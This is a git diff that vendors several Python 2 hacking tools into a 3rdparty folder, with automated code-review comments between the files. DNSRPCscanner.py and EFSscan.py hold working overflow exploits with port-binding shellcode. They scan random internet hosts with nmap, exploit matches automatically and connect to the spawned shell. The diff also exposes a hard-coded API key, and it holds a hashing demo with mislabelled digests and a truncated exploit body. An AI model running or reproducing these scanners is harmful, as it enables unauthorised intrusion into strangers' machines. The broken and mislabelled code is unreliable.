diff --git a/3rdparty/0x150 v2.1.py b/3rdparty/0x150 v2.1.py new file mode 100644 index 0000000..f3ba7f4 --- /dev/null +++ b/3rdparty/0x150 v2.1.py 
@@ -0,0 +1,167 @@ +#!/usr/bin/python +# -*- coding: utf-8 -*- +# 0x150 Web Crawler v2.1 + +from PyQt4 import QtCore, QtGui +import socket +import urllib +import urllib2 +import mechanize +import urlparse +from xml.dom.minidom import parse, parseString +from bs4 import BeautifulSoup +import base64 +try: + _fromUtf8 = QtCore.QString.fromUtf8 +except AttributeError: + _fromUtf8 = lambda s: s +class MyOpener(urllib.FancyURLopener): + version = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15' + +class Ui_MainWindow(object): + def setupUi(self, MainWindow): + MainWindow.setObjectName(_fromUtf8("MainWindow")) + MainWindow.resize(722, 364) + self.centralwidget = QtGui.QWidget(MainWindow) + self.centralwidget.setObjectName(_fromUtf8("centralwidget")) + self.pushButton = QtGui.QPushButton(self.centralwidget) + self.pushButton.setGeometry(QtCore.QRect(320, 10, 111, 31)) + self.pushButton.setObjectName(_fromUtf8("pushButton")) + self.listView = QtGui.QListWidget(self.centralwidget) + self.listView.setGeometry(QtCore.QRect(10, 50, 301, 251)) + self.listView.setObjectName(_fromUtf8("listView")) + self.textEdit = QtGui.QLineEdit(self.centralwidget) + self.textEdit.setGeometry(QtCore.QRect(10, 10, 301, 31)) + self.textEdit.setObjectName(_fromUtf8("textEdit")) + self.textEdit.setPlaceholderText(_fromUtf8("Reverse Çek")) + self.pushButton_2 = QtGui.QPushButton(self.centralwidget) + self.pushButton_2.setGeometry(QtCore.QRect(320, 50, 111, 31)) + self.pushButton_2.setObjectName(_fromUtf8("pushButton_2")) + #self.pushButton_4 = QtGui.QPushButton(self.centralwidget) + #self.pushButton_4.setGeometry(QtCore.QRect(320, 90, 111, 31)) + #self.pushButton_4.setObjectName(_fromUtf8("pushButton_4")) + self.listView_2 = QtGui.QListWidget(self.centralwidget) + self.listView_2.setGeometry(QtCore.QRect(440, 10, 271, 291)) + self.listView_2.setObjectName(_fromUtf8("listView_2")) + self.pushButton_5 = QtGui.QPushButton(self.centralwidget) + 
self.pushButton_5.setGeometry(QtCore.QRect(320, 90, 111, 31)) + self.pushButton_5.setObjectName(_fromUtf8("pushButton_5")) + self.pushButton_3 = QtGui.QPushButton(self.centralwidget) + self.pushButton_3.setGeometry(QtCore.QRect(320, 270, 111, 31)) + self.pushButton_3.setObjectName(_fromUtf8("pushButton_3")) + MainWindow.setCentralWidget(self.centralwidget) + self.menubar = QtGui.QMenuBar(MainWindow) + self.menubar.setGeometry(QtCore.QRect(0, 0, 722, 29)) + self.menubar.setObjectName(_fromUtf8("menubar")) + self.menuDosya = QtGui.QMenu(self.menubar) + self.menuDosya.setObjectName(_fromUtf8("menuDosya")) + + MainWindow.setMenuBar(self.menubar) + self.statusbar = QtGui.QStatusBar(MainWindow) + self.statusbar.setObjectName(_fromUtf8("statusbar")) + MainWindow.setStatusBar(self.statusbar) + self.actionKaydet = QtGui.QAction(MainWindow) + self.actionKaydet.setObjectName(_fromUtf8("actionKaydet")) + self.actionKaydet.setShortcut('Ctrl+S') + + self.actionKaydet.triggered.connect(self.saveFile) + self.actionExit = QtGui.QAction(MainWindow) + self.actionExit.setObjectName(_fromUtf8("actionExit")) + self.actionExit.setShortcut('Ctrl+Q') + self.actionExit.triggered.connect(QtGui.qApp.quit) + self.menuDosya.addAction(self.actionKaydet) + self.menuDosya.addAction(self.actionExit) + self.menubar.addAction(self.menuDosya.menuAction()) + + self.retranslateUi(MainWindow) + QtCore.QMetaObject.connectSlotsByName(MainWindow) + QtCore.QObject.connect(self.pushButton,QtCore.SIGNAL("clicked()"),self.reverse) + QtCore.QObject.connect(self.pushButton_2,QtCore.SIGNAL("clicked()"),self.cekkeke) + # QtCore.QObject.connect(self.pushButton_4,QtCore.SIGNAL("clicked()"),self.temizle) + QtCore.QObject.connect(self.pushButton_5,QtCore.SIGNAL("clicked()"),self.temizle2) + QtCore.QObject.connect(self.pushButton_3,QtCore.SIGNAL("clicked()"),self.saveFile) + + def temizle(self): + self.listView_2.clear() + def temizle2(self): + self.listView.clear() + def cekkeke(self): + self.listView_2.clear() + 
self.myopener = MyOpener() + #page = urllib.urlopen(url) + self.page = self.myopener.open("http://"+ str(self.listView.currentItem().text())) + + self.text = self.page.read() + self.page.close() + + self.soup = BeautifulSoup(self.text) + + for self.tag in self.soup.findAll('a', href=True): + self.xx = self.tag["href"] + if self.xx.startswith("http://") == False and self.xx.startswith("https://")==False: + if self.xx.startswith("/")==True: + self.listView_2.addItem(self.listView.currentItem().text()+self.xx) + else: + self.listView_2.addItem(self.listView.currentItem().text()+"/"+self.xx) + def retranslateUi(self, MainWindow): + MainWindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "0x150 Web Crawler v2.1", None, QtGui.QApplication.UnicodeUTF8)) + self.pushButton.setText(QtGui.QApplication.translate("MainWindow", "< < Reverse IP", None, QtGui.QApplication.UnicodeUTF8)) + self.pushButton_2.setText(QtGui.QApplication.translate("MainWindow", "<< Crawler >>", None, QtGui.QApplication.UnicodeUTF8)) + self.pushButton_3.setText(QtGui.QApplication.translate("MainWindow", "< < Kaydet >>", None, QtGui.QApplication.UnicodeUTF8)) + self.menuDosya.setTitle(QtGui.QApplication.translate("MainWindow", "Dosya", None, QtGui.QApplication.UnicodeUTF8)) + #self.menuHakk_nda.setTitle(QtGui.QApplication.translate("MainWindow", "Hakkında", None, QtGui.QApplication.UnicodeUTF8)) + self.actionKaydet.setText(QtGui.QApplication.translate("MainWindow", "Kaydet", None, QtGui.QApplication.UnicodeUTF8)) + self.actionExit.setText(QtGui.QApplication.translate("MainWindow", "Exit", None, QtGui.QApplication.UnicodeUTF8)) + #self.pushButton_4.setText(QtGui.QApplication.translate("MainWindow", "Temizle >>", None, QtGui.QApplication.UnicodeUTF8)) + self.pushButton_5.setText(QtGui.QApplication.translate("MainWindow", "< < Temizle", None, QtGui.QApplication.UnicodeUTF8)) + def saveFile(self): + self.filename = QtGui.QFileDialog.getSaveFileName(None, 'Save File',"/") + self.f = 
open(self.filename, 'w') + self.xe = open(self.textEdit.text()+"_reverse-ip.txt","w") + items = [] + cocumuyo = [] + for index in xrange(self.listView_2.count()): + items.append(self.listView_2.item(index)) + for i in items: + #print i.text() + self.f.write(i.text()+"\n") + for ix in xrange(self.listView.count()): + cocumuyo.append(self.listView.item(ix)) + for i in cocumuyo: + self.xe.write(i.text()+"\n") + self.xe.close() + self.f.close() + #print self.listView.currentItem().text() + def reverse(self): + self.listView.addItem(self.textEdit.text()) + self.sites = [] + self.top = 50 + self.skip = 0 + self.account_key ="6XgKqcpSQqUPnODbSdOK9sOy30ng0ilUci99d5pol8I" + self.ipal = self.textEdit.text() + self.ip = socket.gethostbyname(str(self.ipal)) + while self.skip < 200: + self.url = "https://api.datamarket.azure.com/Data.ashx/Bing/Search/v1/Web?Query='ip:%s'&$top=%s&$skip=%s&$format=Atom"%(self.ip,self.top,self.skip) + self.request = urllib2.Request(self.url) + self.auth = base64.encodestring("%s:%s" % (self.account_key, self.account_key)).replace("\n", "") + self.request.add_header("Authorization", "Basic %s" % self.auth) + self.res = urllib2.urlopen(self.request) + self.data = self.res.read() + self.xmldoc = parseString(self.data) + self.site_list = self.xmldoc.getElementsByTagName('d:Url') + for self.site in self.site_list: + self.domain = self.site.childNodes[0].nodeValue + self.domain = self.domain.split("/")[2] + if self.domain not in self.sites: + self.sites.append(self.domain) + self.skip += 50 + for self.xs in self.sites: + self.listView.addItem(self.xs) +if __name__ == "__main__": + import sys + app = QtGui.QApplication(sys.argv) + MainWindow = QtGui.QMainWindow() + ui = Ui_MainWindow() + ui.setupUi(MainWindow) + MainWindow.show() + sys.exit(app.exec_()) \ No newline at end of file diff --git a/3rdparty/Crypter.py b/3rdparty/Crypter.py new file mode 100644 index 0000000..c0615a0 --- /dev/null +++ b/3rdparty/Crypter.py 
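Review bot: The Bing Datamarket account key on the `self.account_key ="6XgKqcpSQqUPnODbSdOK9sOy30ng0ilUci99d5pol8I"` line in `reverse` is committed in clear text, so it is readable by anyone with access to the repository and should be treated as leaked and rotated; the script should load it from the environment or a config file instead, e.g. `self.account_key = os.environ.get("BING_ACCOUNT_KEY", "")` (which needs an `import os` next to the other imports). `saveFile` also passes the dialog result straight to `open(self.filename, 'w')` without handling a cancelled dialog, where `getSaveFileName` returns an empty name and the open fails; add `if not self.filename: return` before the `open` call. The hunk imports `mechanize`, `urlparse` and `parse` but never uses them, and the `mechanize` import makes the file fail at import time on hosts without that package.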
@@ -0,0 +1,66 @@ +from Crypto.Hash import HMAC +from Crypto.Hash import MD2 +from Crypto.Hash import MD4 +from Crypto.Hash import MD5 +from Crypto.Hash import RIPEMD +from Crypto.Hash import SHA +from Crypto.Hash import SHA256 + + + + ######## + #B3mB4m# + ######## + + +#Hi guyss im B3mB4m to day topic how to use PyCrypto - The Python Cryptography Toolkit ? !! + +# You can see codes here, but � want change somethins + +word = raw_input("Give me the word : ") + + +""" + +from Crypto.Hash import HMAC +from Crypto.Hash import MD2 +from Crypto.Hash import MD4 +from Crypto.Hash import MD5 +from Crypto.Hash import RIPEMD +from Crypto.Hash import SHA +from Crypto.Hash import SHA256 + +HMAC-MD2-MD4-MD5-SHA-SHA526-RIPEMD .. now lets try + + +""" + + +secret = b'B3mB4m' +h = HMAC.new(secret) +h.update(word) +print "HMAC = "+h.hexdigest() + +h2 = MD2.new() +h2.update(word) +print "MD2 = "+h2.hexdigest() + +h3 = MD4.new() +h3.update(word) +print "MD4 = "+h3.hexdigest() + +h4 = MD5.new() +h4.update(word) +print "MD5 = "+h3.hexdigest() + +h5 = RIPEMD.new() +h5.update(word) +print "RIPEMD = "+h5.hexdigest() + +h6 = SHA.new() +h6.update(word) +print "SHA = "+h6.hexdigest() + +h7 = SHA.new() +h7.update(word ) +print "SHA256 = "+h7.hexdigest() diff --git a/3rdparty/DNSRPCscanner.py b/3rdparty/DNSRPCscanner.py new file mode 100644 index 0000000..4787401 --- /dev/null +++ b/3rdparty/DNSRPCscanner.py 
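Review bot: Two of the printed labels do not match the digest they print: the MD5 line reads `print "MD5 = "+h3.hexdigest()` and so prints the MD4 digest a second time, and the block labelled SHA256 constructs `h7 = SHA.new()` (SHA-1); change them to `print "MD5 = "+h4.hexdigest()` and `h7 = SHA256.new()`. `HMAC.new(secret)` with no `digestmod` falls back to MD5 in PyCrypto, so the first line is HMAC-MD5 rather than something current; pass `digestmod=SHA256` if a modern construction is intended, and a comment should say that MD2, MD4, MD5 and SHA-1 appear here only for comparison and are not collision-resistant. `SHA526` in the triple-quoted block is presumably a typo for SHA256, and the `raw_input`/`print` statements make the file Python 2 only.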
@@ -0,0 +1,178 @@ +#!/usr/bin/python +#This is a Windows DNS RPC service scanner for the new exploit #http://www.milw0rm.com/exploits/3737, uses nmap to locate win2000 machines +#and if found continues to use the exploit. Threw in a little threading to speed +#the process up. Remove the 2000 and whitespace in between at line 137 to exploit +#all windows machines found. I noticed for this exploit you need impacket for it +#to work properly, http://oss.coresecurity.com/repo/Impacket-0.9.6.0.tar.gz +#download that, untar, cd, su root, python setup.py install +#thats it... + +#!!! You need to be root for the nmap flags to work properly !!! + +# Remote exploit for the 0day Windows DNS RPC service vulnerability as +# described in http://www.securityfocus.com/bid/23470/info. Tested on +# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444 +# and then connects to it. +# +# Cheers to metasploit for the first exploit. +# Written for educational and testing purposes. +# Author shall bear no responsibility for any damage caused by using this code +# Winny Thomas :-) + +import os, StringIO, re, random, commands, sys, time, thread +try: + from impacket.dcerpc import transport, dcerpc, epm + from impacket import uuid +except(ImportError): + print "\nYou need the Impacket Module" + print "http://oss.coresecurity.com/repo/Impacket-0.9.6.0.tar.gz\n" + sys.exit(1) + +#Portbind shellcode from metasploit; Binds port to TCP port 4444 +shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" +shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9" +shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56" +shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22" +shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30" +shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81" +shellcode += 
"\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42" +shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22" +shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9" +shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79" +shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab" +shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa" +shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48" +shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1" +shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0" +shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe" +shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9" +shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84" +shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56" +shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8" +shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79" +shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6" +shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9" + +# Stub sections taken from metasploit +stub = '\xd2\x5f\xab\xdb\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00' +stub += '\x70\x00\x00\x00\x00\x00\x00\x00\x1f\x38\x8a\x9f\x12\x05\x00\x00' +stub += '\x00\x00\x00\x00\x12\x05\x00\x00' +stub += '\\A' * 465 +# At the time of overflow ESP points into our buffer which has each char +# prepended by a '\' and our shellcode code is about 24+ bytes away from +# where EDX points +stub += '\\\x80\\\x62\\\xE1\\\x77'#Address of jmp esp from user32.dll +# The following B's which in assembly translates to 'inc EDX' increments +# about 31 times EDX so that it points into our shellcode +stub += '\\B' * 43 +# Translates to 
'jmp EDX' +stub += '\\\xff\\\xe2' +stub += '\\A' * 134 +stub += '\x00\x00\x00\x00\x76\xcf\x80\xfd\x03\x00\x00\x00\x00\x00\x00\x00' +stub += '\x03\x00\x00\x00\x47\x00\x00\x00' +stub += shellcode + +def timer(): + now = time.localtime(time.time()) + return time.asctime(now) + +# Code ripped from core security document on impacket +# www.coresecurity.com/files/attachments/impacketv0.9.6.0.pdf +# Not a neat way to discover a dynamic port :-) +def DiscoverDNSport(target): + trans = transport.SMBTransport(target, 139, 'epmapper') + trans.connect() + dce = dcerpc.DCERPC_v5(trans) + dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0'))) + pm = epm.DCERPCEpm(dce) + handle = '\x00'*20 + while 1: + dump = pm.portmap_dump(handle) + if not dump.get_entries_num(): + break + handle = dump.get_handle() + entry = dump.get_entry().get_entry() + if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'): + port = entry.get_string_binding().split('[')[1][:-1] + return int(port) + + print '[-] Could not locate DNS port; Target might not be running DNS' + +def ExploitDNS(target, port): + trans = transport.TCPTransport(target, port) + trans.connect() + dce = dcerpc.DCERPC_v5(trans) + dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0'))) + + dce.call(0x01, stub) + +def ConnectRemoteShell(target): + connect = "/usr/bin/telnet " + target + " 4444" + os.system(connect) + + +def Worker(): + + global num + global found + + nmap = StringIO.StringIO(commands.getstatusoutput('nmap -T 3 -O --host-timeout 35s --osscan-guess -iR 1')[1]).readlines() #Change your nmap flags if needed + + for tmp in nmap: + if re.search("QUITTING!",tmp): + print '[-] You must run this script as root for the nmap flags to work properly!!!' 
+ print 'Type: Ctrl-C\n' + sys.exit(1) + ip = re.findall("\d*\.\d*\.\d*\.\d*", tmp) + if ip: + target = ip[0] + print "Searching:",target + for tmp in nmap: + if re.search("Aggressive OS guesses:", tmp): + os = tmp.split(",",1)[0].replace("Aggressive OS guesses:","") + if os: + os = re.sub(r'\(\d+%\)',"",os,1) + print "\tFound:",os + num +=1 + if re.search("Windows 2000",os): #Take out the 2000 to exploit all windows found machines + found.append(target+" : "+os) + print "\tFound a Win2000 machine:",os + print '\n[+] Locating DNS RPC port' + port = DiscoverDNSport(target) + print '[+] Located DNS RPC service on TCP port: %d' % port + ExploitDNS(target, port) + print '[+] Exploit sent. Connecting to shell in 3 seconds' + time.sleep(3) + ConnectRemoteShell(target) + +if len(sys.argv) != 2: + print "\n\t d3hydr8[at]gmail[dot]com DNSRPCscanner v1.0" + print "\t--------------------------------------------------" + print "\n\tUsage: ./DNSRPCscanner.py \n" + print "\tEx. ./DNSRPCscanner.py 10000\n" + sys.exit(1) + +else: + print "\n d3hydr8[at]gmail[dot]com DNSRPCscanner v1.0" + print "--------------------------------------------------" + print "[+] Scanning: 0day Windows DNS RPC service vulnerability" + print "[+] Targets:",int(sys.argv[1]) + print "[+] Starting:",timer(),"\n" + print "[+] Scanning...\n" + found = [] + num = 0 + for x in range(10): + for i in range(int(sys.argv[1])/10): + time.sleep(random.randint(1, 3)) + work = thread.start_new_thread(Worker, ()) +print "\n[-] Scanning Complete:",timer() +print "[-] Found:",num,"o-systems" +print "[-] Found:",len(found),"using win2k\n" +if len(found) >=1: + print "[-] Target List:\n" + for os in found: + print os + + + + diff --git a/3rdparty/EFSscan.py b/3rdparty/EFSscan.py new file mode 100644 index 0000000..cb94578 --- /dev/null +++ b/3rdparty/EFSscan.py 
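Review bot: The summary loop at module level, `for os in found: print os`, rebinds the name `os` and shadows the `os` module imported on the first import line (the same name is reused as a local string inside `Worker`); rename it, e.g. `for entry in found: print entry`. `DiscoverDNSport` falls off the end and returns None after printing its "Could not locate DNS port" message, and `Worker` then formats that None with `'%d' % port`, which raises TypeError instead of reporting the miss, so the None case needs an explicit check before the format. As a vendored copy of a 2007 milw0rm/metasploit exploit under `3rdparty/`, the file should carry a header recording its source URL, license and that it is Python 2 only (`print` statements, `thread`, `commands`, `StringIO`), since the `shellcode` and `stub` byte blobs cannot be reviewed from source and are taken on trust.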
@@ -0,0 +1,146 @@ +#!/usr/bin/python +#Modified Winny Thomas EFS exploit to scan(uses nmap) for random open ftp ports then +#check the banner for EFS server, if found, exploit it... +#http://www.milw0rm.com/exploits/3579 +#d3hydr8[at]gmail[dot]com + +# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability +# was discovered by h07 and a POC for windows XP SP2 (polish version) was +# provided. This exploit was tested on windows 2000 server SP4. The exploit +# binds a shell on TCP port 4444. +# +# Author shall bear no responsibility for any screw ups +# Winny Thomas :-) + +import os +import sys +import time +import struct +import socket +import StringIO, re, commands + +shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" +shellcode += "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48" +shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x48\x45\x34\x4e\x33\x4b\x38\x4e\x37" +shellcode += "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38" +shellcode += "\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x33\x4b\x38" +shellcode += "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" +shellcode += "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e" +shellcode += "\x46\x4f\x4b\x43\x46\x35\x46\x32\x4a\x52\x45\x47\x45\x4e\x4b\x58" +shellcode += "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x34" +shellcode += "\x4b\x38\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x30\x4e\x42\x4b\x48" +shellcode += "\x49\x38\x4e\x46\x46\x52\x4e\x31\x41\x36\x43\x4c\x41\x43\x4b\x4d" +shellcode += "\x46\x36\x4b\x48\x43\x34\x42\x53\x4b\x48\x42\x44\x4e\x50\x4b\x58" +shellcode 
+= "\x42\x47\x4e\x31\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x55\x4a\x56" +shellcode += "\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x36" +shellcode += "\x43\x35\x48\x36\x4a\x36\x43\x43\x44\x43\x4a\x36\x47\x37\x43\x57" +shellcode += "\x44\x53\x4f\x35\x46\x45\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e" +shellcode += "\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e" +shellcode += "\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x56\x44\x30" +shellcode += "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" +shellcode += "\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x45\x43\x35\x43\x35\x43\x44" +shellcode += "\x43\x55\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x31" +shellcode += "\x4e\x45\x48\x36\x43\x55\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" +shellcode += "\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" +shellcode += "\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" +shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d" +shellcode += "\x4a\x46\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x45\x4f\x4f\x48\x4d" +shellcode += "\x42\x35\x46\x45\x46\x55\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x56" +shellcode += "\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x55" +shellcode += "\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x46\x48\x46\x4a\x36\x43\x46" +shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x46\x42\x35\x49\x35\x49\x32\x4e\x4c" +shellcode += "\x49\x38\x47\x4e\x4c\x36\x46\x34\x49\x38\x44\x4e\x41\x53\x42\x4c" +shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x44\x4e\x32" +shellcode += "\x43\x59\x4d\x38\x4c\x57\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" +shellcode += "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x34\x4f\x4f" +shellcode += "\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x45\x41\x45\x41\x55\x4c\x36" +shellcode += "\x41\x30\x41\x35\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x46" +shellcode += 
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x46" +shellcode += "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f" +shellcode += "\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" +shellcode += "\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x36\x43\x55\x4f\x4f\x48\x4d" +shellcode += "\x4f\x4f\x42\x4d\x5a" + +def ConnectRemoteShell(target): + connect = "/usr/bin/telnet " + target + " 4444" + os.system(connect) + +def ExploitFTP(target): + sockAddr = (target, 21) + tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + tsock.connect(sockAddr) + response = tsock.recv(1024) + print response + + # At the time of overflow EBX points into our shellcode + payload = 'A' * 2553 + # NOP's pad with a 15 byte jump over some junk and the RET address + # Jumps into our shellcode + payload += '\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f' + # Address of 'call ebx' from kernel32.dll SP4 + payload += struct.pack('" + sys.exit(1) +else: + num=sys.argv[1] + + print "\n d3hydr8[at]gmail[dot]com EFSScan v1.0" + print "--------------------------------------------------" + print "+ Target: Easy File Sharing FTP server V2.0" + print "+ Target port: 21" + print "+ Scanning:",num,"\n" + + count = 0 + while count != int(num): + count += 1 + print "Trying:",count,"of",num + #Change your nmap arguments, if you want. + nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 -p 21 -iR 1 | grep -B 4 open')[1]).readlines() + for tmp in nmap: + if re.search("21/tcp\s+(?=open)", tmp): + port = int(21) + for tmp in nmap: + ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp) + if ipaddr: + host = ipaddr[0] + print "\n- Found port open on",host,"checking banner." + + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(10) + s.connect((host, port)) + time.sleep(7) + s.send("\r\n") + response = s.recvfrom(1024)[0] + s.close() + #Change this to whatever EFS banner looks like. 
(use lowercase) + if re.search("easy file", response.lower()): + print "\n\t\tEFS server found in banner, attempting to exploit...\n" + ExploitFTP(host) + else: print "\tNo Match:",response,"\n" + except(socket.error,NameError), msg: + print "\tAn error occurred:", msg,"\n" + s.close() +# milw0rm.com [2006-08-26] + diff --git a/3rdparty/P-Web Vuln Scabber(XSS,SQL,etc).py b/3rdparty/P-Web Vuln Scabber(XSS,SQL,etc).py new file mode 100644 index 0000000..ecf42d7 --- /dev/null +++ b/3rdparty/P-Web Vuln Scabber(XSS,SQL,etc).py 
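Review bot: The body of `ExploitFTP` is cut short on the `payload += struct.pack('" + sys.exit(1) +else:` line, where everything between the `struct.pack('` argument and the `sys.exit(1)` of the usage branch is missing, so the file as shown does not parse; this may be an artefact of how the diff was captured (an angle bracket inside the format string swallowed as markup), but the committed file should be checked for completeness. In the scan loop, `except(socket.error,NameError), msg:` catches NameError, which masks the case where neither regex loop assigned `host` or `port` before the `s.connect((host, port))` call and the case where `s` is unbound when the handler runs `s.close()`; initialise `host` and `port` explicitly and catch only `socket.error`. Like the neighbouring scanner, this vendored file has no license or provenance header beyond the milw0rm URL in its comments and is Python 2 only.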
@@ -0,0 +1,1041 @@ +#!/usr/bin/python + +# VulnDetector Version 0.0.1pa +# Author: Brad Cable +# License: GPL Version 2 + + +## basic config - these need to be changed depending on the site to be scanned ## + +site="http://www.site.com/" # URL to tree/scan +domains=[".site.com",".site2.com"] # whitelist of domains to scan, with a "." infront, it matches all subdomains as well +pagetype="php" # type of code used on the site being scanned ("php" or "asp") + +# log locations, all logs are stored at [the current directory]/logs/LOGFILE +vulnlogfile="gfqlog" # file to log all detected vulnerabilities as they are encountered +urllogfile="gfqurllog" # file to log all urls fetched as they are fetched +reportfile="gfqreport" # at the end of the scan, the detected vulnerabilities are compiled into a neat list, and logged to this file +usecookies=True # whether or not to send a cookie header value each time (True or False) +cookies="" # if usecookies is True, then + +## end basic config ## + + + + + +## advanced config - only change these if you know what you are doing, you really shouldn't need to touch these at all... ## + +xssscan=True # scan for XSS vulns (True or False) +sqliscan=True # scan for SQLI vulns (True or False) + +checklevel=1 # checklevel: + # 1 = Silent SQL, Silent XSS + # 2 = Silent SQL, Silent XSS when possible (semi-silent when not) + # 3 = BLAST THE SITE! 
